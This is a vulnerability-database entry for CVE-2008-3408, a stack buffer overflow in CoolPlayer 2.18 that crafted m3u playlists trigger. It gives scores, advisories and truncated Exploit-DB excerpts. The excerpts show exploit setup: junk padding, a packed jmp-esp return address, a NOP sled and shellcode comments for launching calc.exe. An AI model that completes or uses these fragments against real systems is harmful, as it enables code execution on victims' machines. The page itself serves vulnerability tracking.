CVE-2008-3408
Published: 2008-07-31
Priority: P4 · 31 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 9.66% (94.9th percentile)
Stack-based buffer overflow in CoolPlayer 2.18, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a crafted m3u file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
GHSA
GHSA-ww8m-pmxw-w5x5: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
ghsa_unreviewed·2022-05-02·CVSS 6.8
CVE-2009-1437 [MEDIUM] CWE-119 GHSA-ww8m-pmxw-w5x5: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.
GHSA
GHSA-jhp7-q6m3-qh58: Stack-based buffer overflow in CoolPlayer 2
ghsa_unreviewed·2022-05-01
CVE-2008-3408 [MEDIUM] CWE-119 GHSA-jhp7-q6m3-qh58: Stack-based buffer overflow in CoolPlayer 2
Stack-based buffer overflow in CoolPlayer 2.18, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a crafted m3u file.
No detection rules found.
Exploit-DB
CoolPlayer 2.18 - DEP Bypass
exploitdb·2011-01-02
CVE-2008-3408 CoolPlayer 2.18 - DEP Bypass
---
# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines
print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"
# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
Exploit-DB
CoolPlayer 2.18 - M3U Playlist Buffer Overflow
exploitdb·2009-12-22
CVE-2008-3408 CoolPlayer 2.18 - M3U Playlist Buffer Overflow
---
#!/usr/bin/perl
# Versions affected: 2.18
# Tested on: Windows XP Pro SP2
# Author: data$hack
# Usage: expl.pl
my $file= "exs3.m3u";
my $junk= "A" x 223;
my $eip = pack('V',0x7C836940); #jmp esp from kernel
my $shellcode = "\x90" x 10;
Exploit-DB
CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow
exploitdb·2008-07-29
CVE-2008-3408 CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow
---
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
No writeups or analysis indexed.
http://secunia.com/advisories/31294
http://securityreason.com/securityalert/4088
http://www.exploit-db.com/exploits/15895
http://www.securityfocus.com/bid/30418
http://www.vupen.com/english/advisories/2008/2264/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/44103
https://www.exploit-db.com/exploits/6157